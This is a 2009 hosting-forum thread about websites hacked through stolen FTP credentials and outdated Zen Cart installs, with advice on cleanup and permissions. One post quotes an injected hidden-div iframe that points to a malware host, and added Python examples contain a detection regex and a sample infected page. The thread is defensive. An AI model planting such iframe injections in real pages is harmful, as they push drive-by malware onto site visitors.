View Full Version : My Site Hacked Big Time [merged threads]
....
It appears my account was hacked again. Why doesn't powweb do something about this security hole... I had changed my password to an extremely long length, reformatted my computer, have the latest antivirus.... not to mention I haven't logged into my account since the last incident occurred.
I am extremely close to choosing a different host.
I do know a solution and that is ONLY allowing certain IP addresses (mine) to log into the ftp!
even an email every time someone (including me) logs into my account!!
snowmaker
9-18-09, 11:56 PM
Well you could disable FTP, in OPS, here, FTP (https://ops.powweb.com/webControl/FTP.bml), and then enable it for only as long as you need it.
Thanks but how does that prevent hackers from hacking my account and re-enabling the ftp?
snowmaker
9-19-09, 12:42 AM
Well it doesn't I guess. If both your OPS password and FTP password (which are different, right?) are continually compromised, you might as well go out and buy a paddle..
They are the same. I didn't know they could be different?
snowmaker
9-19-09, 12:48 AM
I believe they are both the same by default (when an account is created), but they can both be changed to something different.
Hmm, thanks. I could try adding another user and making the password different, but that would only help if the OPS was hacked. I'm still very unclear how my site was hacked. My computer? FTP? OPS? PowWeb?
snowmaker
9-19-09, 12:55 AM
Ah, well my suggestion would only apply to making FTP access a bit more secure.
Posts up until this point were removed from a 5-month-old thread.
entrecon
9-19-09, 09:11 AM
Was it ever determined for sure that this was hacked with FTP? Could it be some kind of script injection?
rainbore
9-19-09, 10:42 AM
I'd echo entrecon's question. While there has been a recent spate of PC viruses that target webmasters to hijack FTP accounts, the vast majority of hacks are on websites running old versions of common blog, forum, gallery and other popular scripts with known vulnerabilities. But it is pretty rare for a hosting service to be hacked. Not unheard-of, certainly, but probably the last place you would check.
I usually advise the following steps for cleaning up and securing a hacked site:
Start by doing a virus scan of the computer that you use to create your website and upload the files to your site's server. This is to ensure that you have removed any virus on your local computer that can be used to alter the files for your site or to steal your FTP account information. Most people already use anti-virus software as a matter of course, so it's a good idea to do this scan with software that you do not use on a regular basis so that you are protected against infections that your regular anti-virus program isn't able to find. There are several good free anti-virus or malware scanning programs available online. I recommend Spybot: Search & Destroy, or Malwarebytes' Anti-Malware. Either one will do a thorough scan of your computer and will remove any suspicious files.
Change the passwords on all of the FTP Accounts for the website. Hackers are increasingly targeting FTP account access information - user name and password - to spread their infections. Changing your password on a regular basis is also a good security practice in any case.
Delete all of the website's files from the server. The best way to remove an infection is to wipe the server clean, because hackers often add files to a site that either re-infect the webpages or open a backdoor to the site for manual access. It's a good idea to use the website's Control Panel File Manager to delete the files because FTP programs do not always display hidden files or server control files (like .htaccess). The only files you can leave behind with relative safety are your MySQL database files, since they're almost always on a separate server and are rarely a source of malware. But if you have back-ups of your MySQL data files, you should consider restoring them from your back-ups, too, to make sure that no unauthorized administrator accounts have been created.
Restore the files for your website from your local back-ups. Of course, you need to make sure that your back-ups haven't been infected before you do this or you'll just be restoring the infection as well. Check for malware warnings at
www.google.com/safebrowsing/diagnostic?site=www.yoursite.com
to see which pages (if any) they may have marked as suspicious, and see if your local copies of those files are clean. It's also a good idea to check the last modification date on the local files to see if they appear to match the dates when you last updated them. If all is well, you can go ahead and restore the site.
Update all blog, forum, gallery, CMS, and other popular scripts to the latest version. Most hackers gain access to websites by exploiting known vulnerabilities in older versions. The people who make these scripts are usually very good at keeping up with hackers, but you need to watch for these updates and install them as soon as possible. Once you've updated the scripts on your website, be sure to update your local copy as well.
Good luck!
Croc Hunter
9-19-09, 01:04 PM
Solid advice and cool link rainbore. We need more info Chris_S to identify the cause. Are you running Wordpress and/or FileZilla? Update them if you do. There has been an iframe injection trojan plaguing Wp and Fz users for over six months. What antivirus do you use? Download, install, update and perform a "Quick Scan" with Malwarebytes (http://www.malwarebytes.org/) free version and report the findings here. I'd also consider installing a new antivirus if I were you.
Thanks for the advice rainbore. I don't currently have any ftp program installed and haven't accessed my site since the last hack but I was using FileZilla. I had a few simple php scripts but powweb techs said that wasn't the cause. I did not delete everything on the server but powweb removed the hacked code from my pages (using some sort of script?).
It's been a while so I don't know the order for sure. After the last hack was sorted out I changed my password, reformatted my computer and purchased an antivirus. I was using AVG Free before.
My site uses an iframe.
And if I remember correctly the hack had something to do with an Adobe Reader exploit... but it's up to date.
I'm doing the Malwarebytes scan right now and so far no threats found.
tpoynton
9-20-09, 07:40 AM
Unless I am missing something, FileZilla is an FTP program.
Once your site is fixed, a link to it here might help? I am hesitant, but it would help people provide specific recommendations.
If FTP is the culprit, doing as snowmaker suggested in the initial reply to your question is the best solution. Given how often you update your site, this does not seem like it will pose too much of an inconvenience for you.
Croc Hunter
9-20-09, 08:28 AM
Often by the time people discover these things it's too late to restore a backup from OPS. It's a really good idea to keep a local backup of your site. AVG Free is one of the better antivirus programs available. You didn't mention if you're running Wordpress. There was an exploit for some with Acrobat 8 and Wp. http://wordpress.org/support/topic/281767 You could execute a script yourself to clean out the malicious iframe code. Make a backup of your legitimate iframe pages first.
Hi,
As far as I know I'm not using Wordpress. I don't know what it is.
The powweb techs have removed the code for the second time.
I don't see what's wrong with asking powweb to add a feature that blocks all ips except for mine from accessing the FTP and OPS.
If I had customers on my site I would have lost money due to this hack... My site could have been spreading viruses all over the net for the last 5+ months. If only I could be notified of access attempts...
I did not do anything with my site for so long because I really lost my motivation with my site due to the last hack.
Disabling the ftp still does not make my website feel secure. If the OPS is hacked they can re-enable it easily.
Why not send an email confirmation whenever you reactivate the FTP. That way even if the hackers had access to the OPS they would still need access to my email...
and how do you disable the FileManager in the OPS? I never use it and as far as I know that's what the hackers used. Disabling the ftp does not turn the FileManager off.
I think that an email confirmation when any changes are made to the OPS could solve problems. Perhaps one could create an FTP 'session' that is activated by an email confirmation. Or at least an option to do it for those users that want the extra security. I mean forums send confirmations all the time when users sign up to prevent spam...
The OPS password is very secure, and should be changed regularly. I very much doubt that that is the route they're using to get into your site (although I can't be 99.99999% certain).
Maybe if you post your domain name someone here could look to see what you're running, if you're not running Wordpress.
Croc Hunter
9-23-09, 08:52 AM
Any files you have on your account here are your responsibility. If someone complains about your site spreading a virus your account will probably be suspended. Little point in cleaning up files until you stop where they are getting in. 99.99999% of the time it's an outdated or poorly written script on your site. As Ian said, we can't help you without a link to your site.
email is down again. The site is slow. Too many problems.
I recommended Powweb to a few of our clients and they are now coming back to us complaining. We are losing business. This is bad for everybody!!!
I want to ask Powweb administrators to spend some money and buy a bunch of powerful servers. It looks like they are taking too much business for their size and that's hurting all of us!
....
It appears my account was hacked again. Why doesn't powweb do something about this security hole... I had changed my password to an extremely long length, reformatted my computer, have the latest antivirus.... not to mention I haven't logged into my account since the last incident occurred.
I am extremely close to choosing a different host.
I do know a solution and that is ONLY allowing certain IP addresses (mine) to log into the ftp!
even an email every time someone (including me) logs into my account!!
Sorry if my posts seem a little *****y. I'm just getting frustrated and don't see any difference from last time. When the techs removed the code last time I did nothing to the files and left them like that on the server, so if there's a hole somewhere in my site then that could explain the re-infection.
Once again, let me remind people that this is a customer to customer forum and that PowWeb staffers seldom stop by so ranting to them to change things is pretty much futile.
Also the choice to use a low cost shared host was yours and yours alone. You can always seek greener pastures. This comes as a customer not a moderator.
Hi Doc, I totally agree with you. I know that the powweb staff don't regularly come here (I read the sticky or some post here mentioning that), I was mainly 'ranting' to see what others thought. I understand powweb is not the most expensive host. I just thought some features could be very easy to implement, but what do I know. ;) I have used powweb for 3+ years and it has been great other than some outages and the recent hacks. I'm still willing to stick with powweb but I'm getting second thoughts. I hope I can get this sorted out and feel more confident in powweb.
The hacks could definitely be user error, I'm not discounting that. I'm open minded.
Dbrazzell was very helpful the last time he fixed my site.
tpoynton
9-24-09, 09:24 AM
Chris_S, people here are willing to try and help, but you are not giving us information to do so...you've been asked three times to provide a link to your site so people could help you determine potential security issues. Why are you reluctant to do so? If you do not want to post the domain name in the forum, PM people who asked for it.
I had already sent it to the mods. I missed your request. Sorry.
There is absolutely no point in coming in here, asking for help and not providing enough info for us to help you. You haven't told us your website address, so we can't see what scripts you are running. You haven't even told us what scripts you are running.
snowmaker
9-25-09, 12:02 PM
The post containing a URL may have been one of the earlier posts that has been deleted, it's not that Chris_S won't help us help him. Chris_S, can you post it again, please?
tpoynton
9-25-09, 01:17 PM
He's asserted (via PM) that he does not want to post it here for fear of additional hacks. I've looked at the site briefly and it does not appear to be a CMS, but I'm not certain, and I haven't looked around too much. What might be more helpful is a screenshot of the contents of htdocs?
If this has happened twice, and support has fixed it, did they not clearly state what the method of entry was? If it is OPS, there is not much you can do other than change your password regularly and ensure your computer is not infected with something. Maintaining a website takes work, even if you do not update content often.
snowmaker
9-25-09, 01:21 PM
I agree with the PM thing. In fact, after I posted earlier that dawned on me.
I also received a PM and looking around the site it looks as if it's HTML based with java/javascript embedded rather than a CMS standard script.
Thanks for your replies and sorry for the confusion. I'm just being paranoid. If anyone wants to take a look at my site just PM and I will send it to you. I do appreciate your help. Thanks.
Both times the techs said it was an FTP hack. The more I think of it, it's very possible the hacker snuck in while I was attempting to reformat and install Windows.
My site uses a lot of Javascript and CSS. No CMS. Croc Hunter says my code has fundamental errors. Before the first hack I had most of my pages validate correctly at http://validator.w3.org/ however I did not finish as I got hacked and didn't touch my site since.
I took a look at the htdocs and all I have are css, html and js files. I was experimenting with a binaryajax script to get image properties from an image file.
Is FileZilla safe to use now, or should I use a different FTP program?
Here is the previous thread for more info on the first hack.
http://forums.powweb.com/showthread.php?t=82104
I've used FZ for a long time without a problem, but they do update for bugs and holes. Instead of getting FZ to remember your password, set it so you have to type it in each time.
tpoynton
9-26-09, 08:06 AM
Well you could disable FTP, in OPS, here, FTP (https://ops.powweb.com/webControl/FTP.bml), and then enable it for only as long as you need it.
This was in post #2! This will simply not allow anyone to use FTP outside of those times you have it enabled to do updates. You can use a different FTP program if you want, but I'm not sure how much of a difference it will make.
Croc Hunter
9-26-09, 09:25 PM
Put your paranoia aside for a week Chris, I will vouch for any one of these guys who've posted on your thread. Your javascript is old school at a glance via browser, it's too late to check your logs. Loose permissions on your js files etc could be the "fundamental" problem along with outdated code. I or one of these guys would need FTP access to check that (do not post logins here on the forum). Static iframes are not a good idea and your site could be replicated without them. I'm busier than a one legged man in an arse kickin' contest at the moment. Post your domain so these good folk can help you.
Alright here is my site just remove the ^s
in^spired^visuals.c^om
Hmm, with regards to the javascript, what do you mean by loose permissions? It's possible the code is outdated. What I did was search the web for tutorials and scripts that I wanted for my site and used the code from there after modifying it for my purposes. Seemed to work fine. The front page index.html is outdated; it's 4 years old. I was working on getting the other pages perfected and cleaned up first and I haven't had the chance to get to the main page yet.
I have been told many times to not use iframes but I could not find an alternative. There are alternatives but not quite what I need. I need to load pages within the iframe and I don't think a css element can do that? If you can tell me that's a security hole I guess I will have to redesign my site. hmm
tpoynton
9-27-09, 02:43 PM
might be time for a new thread...
I'm not sure how what the iframe does is better than just putting that code directly into the page. More explanation of what you are trying to accomplish is needed. iframes are usually good for having content from another site embedded in yours. I'm not sure why one is needed to have content you created in your site...please explain.
ALSO, back on topic, if FTP was the source of intrusion, I don't think the iframe is the problem. Also, while I only looked at a couple of pages, I didn't see any js files referenced. You can view permissions for them in the filemanager via OPS - simply post what they are here...should be 644 if I recall?
I just checked and the permissions are set to 644 for .js and .css files and 755 for .html files. Some .jpgs are 755 and some are 644. I don't know why they are different.
When designing my website years ago I had reasons for using iframes but that was a long time ago so I don't remember what was going through my head. ;) I will try to explain.
- I don't like how most sites have the entire window 'refresh' whenever a user clicks a link in a menu.
- I like to have control over the individual pages for each image and gallery section.
- If I didn't use iframes then I would have one huge page with everything hidden. Then use css/js to unhide and display the images and text. Or I would have many pages that would include the same main menu and that doesn't seem very efficient. My logic may be flawed. Don't know a whole lot on scripting.
- Requires less scripting to create the effect I want.
It really doesn't matter the reasons as I'm willing to consider alternatives just as long as it creates the same effect that's already on the site.
snowmaker
9-27-09, 09:44 PM
644 is fine for all .js, .css and .html files. 755 is fine for directories. .js files could be fine with permission down to 600. PHP included files, and .php files themselves will mostly work fine at 600. A PHP included directory could be down to 700. Just remember, every file/directory shouldn't have more permissions than it needs to be run, IOW (In Other Words), don't set anything any higher than 644/files, 755/directories. If a script needs higher permissions to be run correctly, scrap it.
The way a webpage 'acts' because of iframes can almost always be duplicated, and probably better, with PHP includes.
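An added example (not snowmaker's or PowWeb's code) of auditing an htdocs tree against the rule in the post above: nothing above 644 for files or 755 for directories, while tighter modes such as 600 and 700 pass. The sample layout it builds in a temp directory is constructed for the demo; the check is a bit-mask ceiling, not an equality test, so a world-executable .html file is flagged while a 600 .js file is not.

```python
"""Audit modes under a web root against the 644-for-files / 755-for-directories ceiling.

Added example, not code from the thread or from PowWeb. The check is a ceiling,
not an equality test: 600 files and 700 directories pass, while anything that is
group- or world-writable, or a world-executable regular file, is reported.
"""
import os
import shutil
import stat
import tempfile

FILE_CEILING = 0o644   # rw-r--r--
DIR_CEILING = 0o755    # rwxr-xr-x


def excess_bits(mode, ceiling):
    """Permission bits present in mode that the ceiling does not allow (0 if compliant)."""
    return (mode & 0o777) & ~ceiling


def audit(root):
    """Walk root and return sorted [(relpath, actual_mode_octal, excess_octal)] for offenders.

    Symlinks are skipped: their own mode is meaningless and following them
    could wander outside the web root.
    """
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        entries = [(os.path.join(dirpath, d), DIR_CEILING) for d in dirnames]
        entries += [(os.path.join(dirpath, f), FILE_CEILING) for f in filenames]
        for path, ceiling in entries:
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue
            mode = stat.S_IMODE(st.st_mode)
            extra = excess_bits(mode, ceiling)
            if extra:
                findings.append((os.path.relpath(path, root), oct(mode), oct(extra)))
    return sorted(findings)


def tighten(root, dry_run=True):
    """Clear only the excess bits on each offender; return [(relpath, new_mode_octal)].

    With dry_run=True nothing is changed, so the list can be reviewed first.
    """
    changed = []
    for rel, mode_s, extra_s in audit(root):
        new_mode = int(mode_s, 8) & ~int(extra_s, 8)
        if not dry_run:
            os.chmod(os.path.join(root, rel), new_mode)
        changed.append((rel, oct(new_mode)))
    return changed


def demo():
    """Build a constructed htdocs layout with mixed modes, audit, fix, and re-audit it."""
    root = tempfile.mkdtemp(prefix='perm-audit-')
    layout = {                     # constructed sample; parents come before children
        'js': 0o755,               # compliant directory
        'index.html': 0o755,       # world-executable HTML: flagged (excess 0o111)
        'js/menu.js': 0o644,       # compliant
        'js/old.js': 0o600,        # tighter than the ceiling: compliant
        'uploads': 0o777,          # world-writable directory: flagged (excess 0o022)
        'uploads/x.php': 0o666,    # group/world-writable file: flagged (excess 0o022)
        'inc': 0o700,              # tighter directory: compliant
    }
    for rel, mode in layout.items():
        path = os.path.join(root, rel)
        if '.' in os.path.basename(rel):
            open(path, 'w').close()
        else:
            os.mkdir(path)
        os.chmod(path, mode)
    before = audit(root)
    tighten(root, dry_run=False)
    after = audit(root)
    shutil.rmtree(root)
    return before, after


if __name__ == '__main__':
    found, remaining = demo()
    for rel, mode, extra in found:
        print(f'{rel}: mode {mode}, excess {extra}')
    print('remaining after tighten:', remaining)
```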
tpoynton
9-27-09, 09:44 PM
Sounds like you want ajax, which does require more scripting - although I have no real idea because I only know how it works in theory...I'd call iframes a shortcut - with all the potential issues.
I wonder if using iframes to call content from your own site has the same security risks as using it to get content from somewhere else?
Yea, this is becoming a bit more complicated than I hoped. Can someone tell me how exactly hackers use iframes? From what I read it was hackers creating sites using iframes to hack search engine results, and it had nothing to do with hackers hacking a legitimate site that uses iframes. I did play around with php scripts and it seemed a lot slower. I would rather stick with browser-side scripting.
The only issues I see (with my limited knowledge) with iframes are that search engines don't search the pages within iframes and that it's no longer a W3C standard.
snowmaker thanks for the tips. I will do some research on file permissions.
snowmaker
9-27-09, 11:22 PM
To give you more of an idea how PHP includes can be used, see any of the sites in my sig. There's basically one file, index.php, that includes a text file to make up a page based on the link clicked.
Thanks. That's the right idea. Is there any way to get rid of the entire page 'flicker' in IE? In Firefox I don't see it, though. Or use PHP to load a page within an element so the entire page doesn't have to reload?
snowmaker
9-27-09, 11:52 PM
I wasn't aware of any flicker-type issues with any of my sites, in any browser that they do work in, I'll have to take a look at that. PHP and CSS can be used well together. See here, 22 Resources to Easily Create CSS Layouts | Vandelay Design Blog (http://vandelaydesign.com/blog/design/css-layout-tools/)
HalfaBee
9-28-09, 05:01 AM
You don't need to use php for AJAX like pages.
You can just load the static pages via JS and display them in a <div>.
I don't think the iframes are the way the hackers are hacking sites, it is just that they insert an iframe with a link to malware.
Croc Hunter
9-29-09, 02:35 AM
I've had several old clients contact me complaining of this lately. 9/10 infected sites are running out of date applications like Wordpress, Zencart, Movable Type and they or someone who logs into the application/FTP finds a trojan on their computer with Malwarebytes. It inserts the malicious iframe code into all home, default, index, type files account wide.
You have to update the applications and reset every database, FTP, OPS account, etc passwords. Then cleanup all other infected files and don't let anyone login until they've run Malwarebytes.
I searched and searched for a script to strip out the <div style="display:none">blahcrapolablah<iframe width=436 height=773 src="http://russian-crap.ru:1234/index.php" ></iframe></div><div style="display:none">
How hard would a cleanup script be to write? I tried a few times but it's a bit beyond me. Can someone write it? I would pay. Some of these guys have hundreds of thousands of files and of course.. no backups.
and they or someone who logs into the application/FTP finds a trojan on their computer with Malwarebytes. It inserts the malicious iframe code into all home, default, index, type files account wide.
I think that's what happened but instead of inserting iframe code an unescape javascript function was inserted into every page.
If no one else has anything to add I will delete everything off the server and refresh it from the back ups.
Thanks again for the help.
GoldenEagles
10-7-09, 03:18 AM
This is my first experience having my website "hacked", or invaded. Isn't there a law against this? I thought I was safe.
On 9/1/2009 at 3:10 into 3:11 every one of the several hundred html files on my site was modified. This "Iframe" tag was added to EVERY html file.
<<iframe details removed>>
This attack dug deep into every directory and subdirectory, and did not miss one html file (and it covered index.php files too.)
I don't know exactly what this "IFRAME" tag is supposed to do, or how it does it, this is all very new to me, but apparently this simple addition will result in malware being loaded onto a visitor's computer. As a result, Google diagnostics has labeled my site "suspicious."
(Can someone please explain how this "Iframe" tag can cause malware to be downloaded to my visitor's computer? How is that possible?)
I did not discover the issue until today. And I immediately spent about 4 hours uploading clear copies of every HTML file. (I had other plans for my time, I can assure you).
I want to know if this has happened to anyone else on powweb recently. Is this a system or a network issue? Or was my site singled out for this treatment?
And I want to know how in the world this could have happened. I thought I was the only one who could modify files on my site. But here, several hundred HTML files were modified without my consent or knowledge. Every html file on the site. Did not miss one of them. Several hundred.
Can someone PLEASE give me an idea of where to start looking to try to understand how this happened, so hopefully I can do something that will make sure it will never happen again?
Sincerely,
GoldenEagles
HalfaBee
10-7-09, 04:09 AM
Hacking mostly occurs due to old versions of CMS's like wordpress etc.
Please remove the offending URL from your post. :)
Croc Hunter
10-8-09, 01:48 AM
It's a trojan keystroke recorder. I've had to clean up several accounts here and at another host. I wish someone clever would write a little script to strip out the <iframe>*</iframe> infection.
Here's a quick what to do guide.
1. Install, update and scan your PC with Malwarebytes
2. Update and scan your PC/Mac with your antivirus
3. Restore the oldest site backup from in OPS or your own clean backup.
4. Download the latest version of any application like WordPress, ZenCart, Gallery etc you use. Upload it overwriting the existing files. Also upgrade your local applications like FileZilla.
5. Go through and manually remove the iframe code from ALL index, home and default files account wide (even files like default-widgets or home2). Don't forget plugins, themes, forum pages etc. (while slow it's safe to do this via OPS FileManager).
6. Reset all OPS, FTP, and database passwords (use strong passwords). Reflect these changes in your config files. Set Chmod permissions on all folders 755 and all files 644.
7. Once you are positive you are clean create a backup!
8. Wait 24hrs. If you do not get re-infected request a review of your site through Google webmaster tools.
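The cleanup script Croc Hunter asked for earlier in the thread (and step 5 of the guide above), as an added example that is not code from the thread or from PowWeb. It matches only the injection shape quoted earlier, a display:none <div> wrapping an <iframe>, so a site's own visible iframes are left alone; the sample page and its host name are constructed placeholders, and each rewritten file is copied to <name>.infected first so the evidence survives.

```python
"""Find and strip hidden-<div> iframe injections from a static site's files.

Added example, not code from the thread or from PowWeb. It matches only the
injection shape quoted in the thread (a display:none <div> wrapping an
<iframe>) and leaves visible iframes alone, since a site may use those
legitimately. Every rewritten file is copied to <name>.infected first.
"""
import os
import re
import shutil
import tempfile

HIDDEN_DIV_OPEN = r'<div\s+style\s*=\s*["\']?\s*display\s*:\s*none\s*;?\s*["\']?\s*>'

# Structural signature of the injection. Host, port and iframe size differ
# between infections, so the regex matches the structure, not a literal URL.
INJECTION_RE = re.compile(
    HIDDEN_DIV_OPEN
    + r'(?:(?!</div>).)*?'                                             # filler text
    + r'<iframe\b[^>]*?\bsrc\s*=\s*["\']?(?P<src>[^"\'\s>]+)[^>]*>'    # the iframe
    + r'.*?</iframe>\s*</div>'
    + r'(?:\s*' + HIDDEN_DIV_OPEN + r')?',   # stray second wrapper some injections leave
    re.IGNORECASE | re.DOTALL,
)


def find_injections(html):
    """Return the src attribute of every hidden-div iframe in the text."""
    return [m.group('src') for m in INJECTION_RE.finditer(html)]


def clean_html(html):
    """Strip every injection; return (cleaned_text, [removed_srcs])."""
    return INJECTION_RE.sub('', html), find_injections(html)


def clean_tree(root, exts=('.html', '.htm', '.php'), dry_run=True):
    """Walk root, report infected files, and unless dry_run rewrite them in place.

    Returns {relative_path: [srcs]} for every file that contained an injection.
    Run with dry_run=True first and read the report before letting it write.
    """
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding='utf-8', errors='surrogateescape') as fh:
                original = fh.read()
            cleaned, srcs = clean_html(original)
            if not srcs:
                continue
            report[os.path.relpath(path, root)] = srcs
            if not dry_run:
                shutil.copy2(path, path + '.infected')   # keep the evidence
                with open(path, 'w', encoding='utf-8', errors='surrogateescape') as fh:
                    fh.write(cleaned)
    return report


# Constructed sample page modelled on the injection quoted in the thread, with a
# placeholder host. The visible gallery iframe is the site's own and must survive.
SAMPLE_PAGE = (
    '<html><body>\n'
    '<iframe src="gallery.html" width="600" height="400"></iframe>\n'
    '<div style="display:none">blahcrapolablah<iframe width=436 height=773 '
    'src="http://malicious-host.example:1234/index.php" ></iframe></div>'
    '<div style="display:none">\n'
    '</body></html>\n'
)


def demo():
    """Write the sample into a temp dir, dry-run, then clean; return what happened."""
    root = tempfile.mkdtemp(prefix='iframe-clean-')
    path = os.path.join(root, 'index.html')
    with open(path, 'w', encoding='utf-8') as fh:
        fh.write(SAMPLE_PAGE)
    preview = clean_tree(root, dry_run=True)      # report only, nothing written
    clean_tree(root, dry_run=False)
    with open(path, encoding='utf-8') as fh:
        cleaned = fh.read()
    backup_kept = os.path.exists(path + '.infected')
    shutil.rmtree(root)
    return preview, cleaned, backup_kept


if __name__ == '__main__':
    found, cleaned_page, kept = demo()
    print('infected files:', found)
    print('backup kept:', kept)
    print(cleaned_page)
```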
GoldenEagles
10-8-09, 02:20 AM
Responding to Halfabee first,
I had forum software PHPBB 3.0 installed sometime last year, worked on configuring it for some time, but I never rolled it out for public use, and I never installed any of the updates. Visiting the PHPBB website, I see the current release is version 3.0.5, and that some of the intermediate updates dealt with some security issues.
Also, I had the ZenCart software installed last year. I worked with configuring it for a couple of weeks, but again, other things came up to capture my time, and I never rolled it out for public use, and of course, I never installed any updates or security patches to it. Both installations occupied folders off of the HTDOCS directory.
I just visited the ZenCart website, and looked at the security patches they offered, none of which I was aware of, none of which I installed, and I can see that there were at least two security issues that were substantial, and might have led to the extent of the compromise I experienced here. This is coupled with the fact that I had seen the probing of the zen cart files in my access logs over time, accesses which I did not know how to interpret. I wondered how anyone even knew the directory paths, as I had never made them public, but there they were, IP's trying to access the zen cart. And this was consistently, a few times a week.
Perhaps these things are akin to some of what you are referring to?
Is there any way to pin down, with a high degree of certainty, whether either of these two avenues were used as the attack path?
p.s. I zipped both installations, and deleted the active folders last night. O yes, and I found three files in my cgi-bin that I know I did not put there. I deleted them too.
GoldenEagles
10-8-09, 02:33 AM
It's a trojan keystroke recorder.
Please explain what this trojan keystroke recorder is, and how would that relate to an attack like this? According to the date and time stamps of the corrupted files, several hundred files were modified in about one minute. That is, several hundred append actions were accomplished in about one minute. That is, the rogue "Iframe" tag set was appended to several hundred html files in about one minute.
Croc Hunter
10-8-09, 10:04 AM
You'd be best to Google it. Once they get access they execute a script to find any index etc and insert the code. It only takes a minute or two. All but one of the accounts I've cleaned so far had out of date ZenCarts. Follow the steps I posted.
Dbrazzell
10-8-09, 12:02 PM
Most of these iframes that get inserted into the sites send visitors over to another third party site that is sitting waiting to give you the latest drive by download, which is usually an entire host of nasty software such as keyloggers, trojans, fake antivirus software, and phishing schemes.
It's really all up to who's running the third party site and what they are feeling like pushing that day.
It's set up so they only have to infect your site once with the malicious iframe. But they can change what visitors are infected with at any time they feel like it.
I have seen the SEO spamming stuff that someone earlier mentioned. That seems to be a lot rarer.
What CMS are you using on this site? I'm wondering if it's current or perhaps I can give some insight as to its security upkeep?
GoldenEagles
10-9-09, 08:45 PM
What CMS are you using on this site? I'm wondering if it's current or perhaps I can give some insight as to its security upkeep?
As noted above, in response to halfabee:
I had forum software PHPBB 3.0 installed sometime last year, worked on configuring it for some time, but I never rolled it out for public use, and I never installed any of the updates. Visiting the PHPBB website, I see the current release is version 3.0.5, and that some of the intermediate updates dealt with some security issues.
Also, I had the ZenCart software installed last year. I worked with configuring it for a couple of weeks, but again, other things came up to capture my time, and I never rolled it out for public use, and of course, I never installed any updates or security patches to it. Both installations occupied folders off of the HTDOCS directory.
I just visited the ZenCart website, and looked at the security patches they offered, none of which I was aware of, none of which I installed, and I can see that there were at least two security issues that were substantial, and might have led to the extent of the compromise I experienced here. This is coupled with the fact that I had seen the probing of the zen cart files in my access logs over time, accesses which I did not know how to interpret. I wondered how anyone even knew the directory paths, as I had never made them public, but there they were, IP's trying to access the zen cart. And this was consistently, a few times a week.
I archived both installations, and deleted the active folders, and just to be safe, I transferred the zipped archives to my local machine. My site is now script free. I think I have closed all the doors.
Any further ideas that you might have, I would like to hear.
GoldenEagles
10-9-09, 08:49 PM
Most of these iframes that get inserted into the sites send visitors over to another third party site that is sitting waiting to give you the latest drive by download, which is usually an entire host of nasty software such as keyloggers, trojans, fake antivirus software, and phishing schemes.
I would like to know how this could be done so easily. Does malware strategy depend on security holes in the browser, and if so, which browser is most vulnerable? And why are these holes not plugged?
Certainly, the idea that things can be downloaded onto your computer without your knowledge, could not be part of the design criteria of any browser? Isn't that right?
snowmaker
10-9-09, 10:09 PM
Certainly, the idea that things can be downloaded onto your computer without your knowledge, could not be part of the design criteria of any browser?
Micro$oft (Internet Explorer) would not agree with that.. why is activex dangerous - Google Search (http://www.google.com/search?q=why+is+activex+dangerous)
GoldenEagles
10-12-09, 01:48 AM
Micro$oft (Internet Explorer) would not agree with that.. why is activex dangerous - Google Search (http://www.google.com/search?q=why+is+activex+dangerous)
I did that search on Google, and I see that the most recent reference to this issue is more than three years old. For that reason, I am concluding that ActiveX controls do not seem to be an issue of high security concern when it comes to majority of avenues used to infect PC's with malware. And I suppose this is especially true because their download is signaled, and the user can choose to reject the download.
From what I understand, the issue that we are dealing with here, are ways to get around download detection routines in the browser, where these malicious programs end up on the person's computer, and running on the person's computer, without the user having any idea that anything at all has been downloaded. Isn't that right?
And I would ask the question again, why aren't these security holes closed? Or perhaps they are closed, but some users don't update their browser to the latest release? Or perhaps, if one hole is closed, that patch itself has a hole in it that the hackers find and exploit. I wonder if someone could give a definitive answer on this point.
GoldenEagles
10-12-09, 02:43 AM
I wanted to give an update on my search for the path that this hacker may have exploited into my website.
As I noted above, I zipped my outdated installation of both Zen Cart and PhpBB3. And I downloaded those archives to my local computer. And I deleted both the zipped archives, and the installation folders for these applications from my website.
Locally, I ran an Avira scan on these two zipped archives.
The phpbb3 archive did not show anything but a few of the iframe infections that I had missed when I first uploaded clean html files into every directory.
However, the Zen Cart archive showed the following infections:
--> Zen_Cart_Installation/images/juno-user
[DETECTION] Contains a recognition pattern of the (harmful) BDS/Katien.R back-door program
--> Zen_Cart__Installation/images/ycplia.php
[DETECTION] Contains recognition pattern of the PHP/C99Shell.C PHP virus
--> Zen_Cart__Installation/images/fdqthz.php
[DETECTION] Contains recognition pattern of the PHP/C99Shell.C PHP virus
I think it is fair to conclude from this, that it is highly probable that the attack on my website came through the Zen Cart installation, which as I noted, had never been used, had never been rolled out for public use, nor had it been updated with any security patches for one year.
When I visited the Zen Cart website a few days ago to look at what security issues had come up during that time period, I found a few that were very serious, and they discussed them openly, and they immediately issued patches. For Zen Cart operators who are paying attention, they could be relatively safe, if they installed the patches immediately. However, their openness in this regard, also gives the hackers exactly the information they need to exploit those zen cart installations where the patches are not installed (like mine). In this regard, I saw a distinct difference in the PHPBB3 approach to security. On the PHPBB3 site, there were no open discussions concerning the details of security issues. Users could report security issues to their security center, but those posts were kept private, and there were no public forums detailing the precise security issues that had come up. This was an obvious choice on their part, as such information can be used by the hackers too as noted.
I would just note from this, that one thing we might learn from this, is that Zen Cart operators should be very careful about following the security issues on the Zen Cart website (as the hackers are obviously following their announcements), and when patches are provided, that these should be implemented immediately. Zen Cart operators should have this goal in mind, that the patches be implemented faster than the hackers can find an unguarded Zen Cart.
I can imagine this, that these hackers have robots combing the web for the presence of Zen Cart installations, and the very minute a security issue is brought forward on the Zen Cart site, they can tell their robot where to look for the newest vulnerability. In support of this thesis, I note that my website is crawled by dozens of robots every day. What are they looking for? Moreover, as I mentioned above, I had seen in my website access logs repeated accesses to the zen cart installation, which was inexplicable to me at the time because I was not aware that I had told anyone that it was there. I did not know what to make of this at the time. These hackers might send their robots out looking for many other kinds of cgi/php installations, but for zen cart, this looks rather easy to exploit given their openness in laying bare the details of the holes found in their security. This is not a criticism of them on this point however. Their openness in this regard is largely due, I think, to the fact that the implementation of security patches in Zen Cart, requires the user to manually modify php code in one or more files. And so, the file names and code have to be laid bare for all users so that the "patches" can be implemented.
This is far different from Windows Update for example, where updates are downloaded, and automatically installed, without anyone seeing the nature of the fix that is being implemented.
